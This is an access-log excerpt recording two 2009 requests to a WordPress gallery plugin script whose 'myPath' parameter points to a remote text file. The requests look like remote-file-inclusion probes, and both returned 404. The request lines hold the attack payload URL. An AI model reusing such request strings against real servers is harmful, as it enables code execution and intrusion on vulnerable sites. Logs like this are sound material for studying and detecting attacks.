82.197.131.40 - - [16/Jul/2009:02:44:25 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:44:25 -0400] "GET /logs/access_log.Q109052900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
